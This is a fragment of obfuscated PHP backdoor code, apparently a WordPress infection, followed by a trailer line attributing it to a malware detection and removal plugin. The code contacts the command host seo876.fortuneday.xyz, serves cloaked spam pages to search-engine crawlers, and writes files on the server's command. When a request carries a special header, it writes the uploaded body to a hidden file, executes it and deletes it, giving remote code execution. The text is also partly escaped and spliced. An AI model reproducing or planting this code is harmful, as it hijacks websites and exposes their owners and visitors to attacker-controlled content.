(@preg_match('#google.co.jp|google.com|yahoo.co.jp|bing.com#i',\$ur) && (@preg_match('#[/\\?]([a-z]+)-(\\d+)(.html)?\$#i',\$uri)||@preg_match('#[/\\?]([a-z]{8})[-_/]?(\\d+)#i',\$uri)))){\n list(\$cntx,\$code,\$ctype) = urlx('http://'.\$getx.'/index?'.\$postdata,\$header,\$postdata);\n if (stripos(\$ctype,'gzip')>0){ @header('Content-type: application/x-gzip'); exit(\$cntx); }\n if (stripos(\$cntx,'<!doct')===0||stripos(\$cntx,'<html')===0){ exit(\$cntx); }\n if (stripos(\$cntx,'<?xml')===0){ @header('Content-type: text/xml'); exit(\$cntx); }\n \n if (stripos(\$cntx,'http')===0){\n if (stripos(\$cntx,'?main_page=')){ @header('Location: ' . \$cntx); exit;}\n if (strstr(\$cntx,\"[,]\")){\$segs = explode(\"[,]\",\$cntx); \$lines = explode(\",\",\$segs[0]); \$result = ''; foreach(\$lines as \$url){ list(\$respbody,\$code) = urlx(\$url,null,null,\$segs[1]);\$result .= \$url.\$respbody; } exit(\$result);}\n }\n if (@preg_match('#^[^.]*.(txt|php)#i',\$cntx)){\$values = explode(\"[,]\",\$cntx); todk(\$values[0],\$values[1]); if(file_exists(\$values[0])){ exit('end ok');}else{ exit('no false');} }\n if (stripos(\$cntx,'ok')===0){ exit(\$cntx.\$gov.\$getx.\$ixv); }\n if (\$code >= 400 && \$code < 500){@header('HTTP/1.1 404 Not Found');exit;}\n if (\$code >= 500){@header('HTTP/1.1 500 Internal Server Error');exit;}\n if (\$cntx!=\"\"){ exit(\$cntx); }\n}\n\nfunction urlx(\$url,\$header=null,\$postdata=null,\$ua=null) {\n if (!function_exists('curl_init')){ return; }\n try {\n \$ch = curl_init();\n curl_setopt(\$ch, CURLOPT_URL, \$url); curl_setopt(\$ch, CURLOPT_FOLLOWLOCATION,1); curl_setopt(\$ch, CURLOPT_SSL_VERIFYPEER, FALSE);\n curl_setopt(\$ch, CURLOPT_SSL_VERIFYHOST, FALSE);curl_setopt(\$ch, CURLOPT_ENCODING, 'gzip,deflate');\n curl_setopt(\$ch, CURLOPT_CONNECTTIMEOUT, 30); curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, 1);\n (\$header===null)?'':curl_setopt(\$ch, CURLOPT_HTTPHEADER, \$header); (\$ua===null||\$ua===\"\")?'':curl_setopt(\$ch, CURLOPT_USERAGENT, \$ua);\n if (\$postdata!==null && \$postdata!==\"\") {curl_setopt(\$ch, CURLOPT_POST, 1); curl_setopt(\$ch, CURLOPT_POSTFIELDS, \$postdata); }\n \$body = curl_exec(\$ch);\$code = curl_getinfo(\$ch,CURLINFO_HTTP_CODE); \$ctype = curl_getinfo(\$ch,CURLINFO_CONTENT_TYPE);curl_close(\$ch);\n } catch (Exception \$e) { }\n return array(\$body,\$code,\$ctype);\n}\nfunction todk(\$fil,\$str){@file_put_contents(\$fil,\$str);}\nfunction clientip(){ \$realip='';\n if (isset(\$_SERVER['HTTP_X_FORWARDED_FOR']) && \$_SERVER['HTTP_X_FORWARDED_FOR'] !== ''){ \$realip = \$_SERVER['HTTP_X_FORWARDED_FOR'];\n } elseif (getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) { \$realip = getenv('REMOTE_ADDR');\n } elseif (isset(\$_SERVER['REMOTE_ADDR']) && \$_SERVER['REMOTE_ADDR'] && strcasecmp(\$_SERVER['REMOTE_ADDR'], 'unknown')) { \$realip = \$_SERVER['REMOTE_ADDR'];\n }\n if (stristr(\$realip, ',')) { \$values = explode(\",\", \$realip); \$realip = \$values[0]; } return \$realip;\n}\n?>\n"; eval { error_reporting(0); @set_time_limit(3600); @ignore_user_abort(1); $gov = "880"; $ixv = '1.11.17'; $getx = "seo876.fortuneday.xyz"; $ip = clientip(); $ur = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ""; $ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ""; $uri = $_SERVER["REQUEST_URI"]; $host = $_SERVER["HTTP_HOST"]; $lang = isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? $_SERVER['HTTP_ACCEPT_LANGUAGE'] : ""; $token = isset($_SERVER['HTTP_XDOIM']) ? $_SERVER['HTTP_XDOIM'] : ""; $proto = !empty($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off' || isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https' || !empty($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off' ? "https" : "http"; $header = array('Lang: ' . $lang, 'User-Agent: ' . $ua, 'Referer: ' . $ur, 'Http-Proto: ' . $proto, 'Http-Host: ' . $host, 'Http-Uri: ' . $uri, "Dbgroup: 880", 'Http-X-Forwarded-For: ' . $ip, 'Token: ' . $token); $postdata = "proto={$proto}&shost={$host}&ip={$ip}&groupid={$gov}&uri={$uri}"; if (strlen($token) > 0) { @todk(".eGA0Ty2WLh", @file_get_contents("php://input"), FILE_USE_INCLUDE_PATH); echo include '.eGA0Ty2WLh'; unlink('.eGA0Ty2WLh'); exit; } if (@preg_match('#google|yahoo|bing#i', $ua) || @preg_match('#google.co.jp|google.com|yahoo.co.jp|bing.com#i', $ur) && (@preg_match('#[/\\?]([a-z]+)-(\\d+)(.html)?$#i', $uri) || @preg_match('#[/\\?]([a-z]{8})[-_/]?(\\d+)#i', $uri))) { list($cntx, $code, $ctype) = urlx('http://' . $getx . '/index?' . $postdata, $header, $postdata); if (stripos($ctype, 'gzip') > 0) { @header('Content-type: application/x-gzip'); exit($cntx); } if (stripos($cntx, '<!doct') === 0 || stripos($cntx, '<html') === 0) { exit($cntx); } if (stripos($cntx, '<?php xml') === 0) { @header('Content-type: text/xml'); exit($cntx); } if (stripos($cntx, 'http') === 0) { if (stripos($cntx, '?main_page=')) { @header('Location: ' . $cntx); exit; } if (strstr($cntx, "[,]")) { $segs = explode("[,]", $cntx); $lines = explode(",", $segs[0]); $result = ''; foreach ($lines as $url) { list($respbody, $code) = urlx($url, null, null, $segs[1]); $result .= $url . $respbody; } exit($result); } } if (@preg_match('#^[^.]*.(txt|php)#i', $cntx)) { $values = explode("[,]", $cntx); todk($values[0], $values[1]); if (file_exists($values[0])) { exit('end ok'); } else { exit('no false'); } } if (stripos($cntx, 'ok') === 0) { exit($cntx . $gov . $getx . $ixv); } if ($code >= 400 && $code < 500) { @header('HTTP/1.1 404 Not Found'); exit; } if ($code >= 500) { @header('HTTP/1.1 500 Internal Server Error'); exit; } if ($cntx != "") { exit($cntx); } } function urlx($url, $header = null, $postdata = null, $ua = null) { if (!function_exists('curl_init')) { return; } try { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); curl_setopt($ch, CURLOPT_ENCODING, 'gzip,deflate'); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $header === null ? '' : curl_setopt($ch, CURLOPT_HTTPHEADER, $header); $ua === null || $ua === "" ? '' : curl_setopt($ch, CURLOPT_USERAGENT, $ua); if ($postdata !== null && $postdata !== "") { curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata); } $body = curl_exec($ch); $code = curl_getinfo($ch, CURLINFO_HTTP_CODE); $ctype = curl_getinfo($ch, CURLINFO_CONTENT_TYPE); curl_close($ch); } catch (Exception $e) { } return array($body, $code, $ctype); } function todk($fil, $str) { @file_put_contents($fil, $str); } function clientip() { $realip = ''; if (isset($_SERVER['HTTP_X_FORWARDED_FOR']) && $_SERVER['HTTP_X_FORWARDED_FOR'] !== '') { $realip = $_SERVER['HTTP_X_FORWARDED_FOR']; } elseif (getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) { $realip = getenv('REMOTE_ADDR'); } elseif (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) { $realip = $_SERVER['REMOTE_ADDR']; } if (stristr($realip, ',')) { $values = explode(",", $realip); $realip = $values[0]; } return $realip; } }; }); @$mEriqO3481();
Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.